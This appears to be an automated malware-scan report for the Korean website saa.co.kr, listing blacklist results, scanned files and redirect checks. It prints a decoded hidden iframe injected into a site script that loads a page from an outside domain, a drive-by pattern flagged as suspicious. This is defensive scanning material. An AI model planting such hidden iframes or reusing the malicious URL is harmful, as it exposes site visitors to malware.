Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=saa.co.kr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://saa.co.kr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://saa.co.kr/ | HTTP/1.1 302 Object moved Cache-Control: private Connection: close Date: Wed, 14 Jan 2015 00:14:20 GMT Location: /main/main.asp Server: Microsoft-IIS/5.0 Content-Length: 141 Content-Type: text/html; Charset=EUC-KR Set-Cookie: ASPSESSIONIDASRRATTC=ABKDJEBCKCAGOHGFMNJMKMPO; path=/ | clean |
http://saa.co.kr/main/main.asp | 200 OK Content-Length: 32243 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.sellcarauction.co.kr <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script> function ViewGrp(metal_kind) { noticeWindow = window.open('/chart.asp?metal_kind='+metal_kind, "Window", "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=317,height=330"); noticeWindow.opener = self; } function load() ...[4407 bytes skipped]... | ||
http://saa.co.kr/main/../js/common.js | 200 OK Content-Length: 2674 Content-Type: application/x-javascript | clean |
http://saa.co.kr/../js/spargon.js | 200 OK Content-Length: 2853 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var InsertMessage = function(obj) {
var obj = eval("document.getElementsByName('" + obj + "')"); var obj_value = obj[0].value; var chk_length = (obj_value.replace(/\s/g,"")).length; if ( chk_length < 1 ) { document.getElementById("input_message").innerHTML += "<font color='red'>¡Ü</font> " + obj[0].alt + "¸¦ ÀÔ·ÂÇϼ¼¿ä<br/>"; return false; } } var NullCheckStart ...[2498 bytes skipped]... Decoded script: <iframe src='http://syochem.iunii.com/swf/_notes/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://log.inside.daum.net/dwi_log/js/dwi.js | 500 Can't connect to log.inside.daum.net:80 Content-Length: 194 Content-Type: text/plain | clean |
http://log.inside.daum.net/test404page.js | 500 Can't connect to log.inside.daum.net:80 Content-Length: 194 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: saa.co.kr
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Connection: close
Date: Wed, 14 Jan 2015 00:14:20 GMT
Location: /main/main.asp
Server: Microsoft-IIS/5.0
Content-Length: 141
Content-Type: text/html; Charset=EUC-KR
Set-Cookie: ASPSESSIONIDASRRATTC=ABKDJEBCKCAGOHGFMNJMKMPO; path=/
...141 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: saa.co.kr
Referer: http://www.google.com/search?q=saa.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.